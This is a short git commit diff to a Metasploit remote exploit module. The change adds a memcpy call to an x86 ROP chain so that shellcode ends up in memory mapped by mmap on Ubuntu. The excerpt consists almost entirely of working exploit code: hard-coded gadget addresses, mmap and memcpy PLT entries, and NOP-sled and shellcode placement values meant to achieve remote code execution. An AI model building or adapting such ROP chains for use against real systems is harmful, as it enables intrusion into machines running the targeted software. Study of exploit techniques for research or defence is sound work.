add memcpy to the ropchain due to the zeroed mmap function under ubuntu

unstable
agix 2013-04-01 14:13:19 +02:00
parent baf1ce22b3
commit 6b639ad2ee
1 changed files with 8 additions and 2 deletions

View File

@ -34,13 +34,19 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
'mmap' => [ 'mmap' => [
0x0816f768, #mmap_64@plt 0x0816f768, #mmap_64@plt
0x0c0c0c0c, #NOPSLED+SHELLCODE 0x8666d07, #add esp, 0x14 / pop ebx / pop ebp / ret
0x0c0c0000, 0x0c0c0000,
0x00010000, 0x00002000,
0x00000007, 0x00000007,
0x00000031, 0x00000031,
0xffffffff, 0xffffffff,
0x00000000, 0x00000000,
0x78696761,
0x0816e4c8, #memcpy@plt
0x0c0c0c0c,
0x0c0c0000,
0x0c0b0000,
0x00002000
], ],
'ret' => [0x08055a70], #ret 'ret' => [0x08055a70], #ret
'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c] 'gadget1' => "0x836e204", #mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c]